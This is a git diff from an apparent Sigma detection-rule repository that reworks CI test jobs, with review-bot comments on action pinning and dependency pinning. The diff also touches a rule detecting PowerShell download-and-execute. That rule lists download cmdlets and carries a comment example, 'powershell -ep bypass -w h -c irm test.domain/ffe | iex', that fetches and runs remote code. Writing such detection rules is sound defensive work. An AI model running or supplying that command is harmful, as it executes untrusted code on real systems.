diff --git a/.github/workflows/sigma-test.yml b/.github/workflows/sigma-test.yml
index 6c9a20e2d..41f87ec68 100644
--- a/.github/workflows/sigma-test.yml
+++ b/.github/workflows/sigma-test.yml
@@ -47,6 +47,8 @@ jobs:
       - uses: actions/checkout@v4
       - name: yaml-lint
         uses: ibiqlik/action-yamllint@v3
+        with:
+          strict: true # fail on warnings as well
 
   test-sigma-logsource:
     runs-on: ubuntu-latest
@@ -64,9 +66,28 @@ jobs:
         pip install PyYAML colorama
         python tests/test_logsource.py
 
-  test-sigma:
+  test-sigma-legacy:
     runs-on: ubuntu-latest
-    needs: test-sigma-logsource
+    needs: yamllint
+    steps:
+      - uses: actions/checkout@v4
+        with:
+          submodules: true
+      - name: Set up Python 3.11
+        uses: actions/setup-python@v5
+        with:
+          python-version: 3.11
+      - name: Install dependencies
+        run: |
+          pip install PyYAML colorama
+      - name: Test Sigma Rules
+        run: |
+          pip install PyYAML colorama
+          python tests/test_rules.py
+
+  sigma-check:
+    runs-on: ubuntu-latest
+    needs: yamllint
     steps:
       - uses: actions/checkout@v4
         with:
@@ -83,7 +104,3 @@ jobs:
       - name: Test Sigma Rule Syntax
         run: |
           sigma check --fail-on-error --fail-on-issues --validation-config tests/sigma_cli_conf.yml rules*
-      - name: Test Sigma Rules
-        run: |
-          pip install PyYAML colorama
-          python tests/test_rules.py
diff --git a/rules/windows/process_creation/proc_creation_win_powershell_download_iex.yml b/rules/windows/process_creation/proc_creation_win_powershell_download_iex.yml
index 119a8e737..ebc66ab7b 100644
--- a/rules/windows/process_creation/proc_creation_win_powershell_download_iex.yml
+++ b/rules/windows/process_creation/proc_creation_win_powershell_download_iex.yml
@@ -22,7 +22,7 @@ detection:
             - 'Invoke-WebRequest '
             - 'iwr '
             - 'Invoke-RestMethod '
-            - 'irm ' #powershell -ep bypass -w h -c irm test.domain/ffe | iex
+            - 'irm ' # powershell -ep bypass -w h -c irm test.domain/ffe | iex
         selection_iex:
             CommandLine|contains:
                 - ';iex $'
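Review bot: The lint job that now runs in strict mode still pulls its third-party action by a mutable tag, `uses: ibiqlik/action-yamllint@v3`, so anyone who can move that tag can run arbitrary code against this checkout on every push; pin it to a full commit SHA and keep the tag as a comment, e.g. `uses: ibiqlik/action-yamllint@<commit-sha> # v3`, and do the same for `actions/checkout@v4` two lines above. The new `strict: true` input is passed through `with:` to the action, which appears to be the documented way to make yamllint warnings fatal, but the inline note `# fail on warnings as well` would read better as a comment line above `with:` so the value stays a bare boolean. The `yamllint` job this hunk belongs to starts before the hunk, so its `permissions:` and trigger configuration cannot be checked here.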
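Review bot: `python-version: 3.11` in the new `test-sigma-legacy` job is an unquoted float; it happens to round-trip to the string `3.11` today, but the same pattern silently turns a future `3.10` into `3.1`, so quote it: `python-version: "3.11"`. The `Test Sigma Rules` step repeats `pip install PyYAML colorama` that the preceding `Install dependencies` step already ran, so the test step can be reduced to `python tests/test_rules.py`. Neither install pins a version or hash, which means the legacy test job resolves whatever PyPI serves at run time; a pinned `pip install 'PyYAML==<version>' 'colorama==<version>'` (or a requirements file used with `--require-hashes`) would make the job reproducible and harder to poison. The `sigma-check` job introduced at the bottom of this hunk continues past the hunk boundary, so its remaining steps are not visible here.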